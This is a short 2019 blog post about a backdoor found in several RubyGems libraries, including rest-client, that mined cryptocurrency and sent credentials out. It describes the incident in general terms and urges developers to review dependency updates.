Monday, August 26, 2019

Rubys in the Rough

    The Ruby programming language is a high level general-purpose programming language that was developed to focus on being Object oriented when the options for it were few and the creator found them lacking. The language uses a package manager called RubyGems to have a standardized platform for managing programs and libraries. 

    Thousands of users are potentially affected by vulnerabilities in 18 versions of Ruby libraries. The vulnerabilities included code that launched crypto miners inside other Ruby Projects. Other features of the compromised libraries included collection and delivery of data including credentials, payment, service provider, and the entire database to a server in the Ukraine. The backdoor contained a way for an attacker to send cookies through this vulnerability and to remotely execute code and commands. The code was inserted into several different crypto-mining libraries as well as a few utilities like omniauth_amazon and cron_parser. These are all relatively small packages, but the malicious actor tried to push his updates onto rest-client which is a much more widely used and scrutinized project, the backdoor was identified within hours and other projects where it was inserted were also discovered.
    Because of the quick identification time, there were only around a thousand downloads of the latest update for this older version of rest-client. However, the smaller libraries had this attack in place for over a month. Thankfully, the total downloads for all of those libraries combined numbered less than 3000. We last saw such dependency attacks in the strong_password library which downloaded a payload from instead of holding malicious code itself. 
    Of crowd sourced and open sourced projects, one must take extra precautions and evaluate the diffs between updates properly before committing to using such a solution. Without due diligence, one could find themselves unknowingly inserting bad code into their projects or relying on bad dependencies that could compromise both developer data, and user data in their products and projects. Relying on the descriptions and faith that a thoroughly used gem is a disservice to you as well as a disservice to the community at large.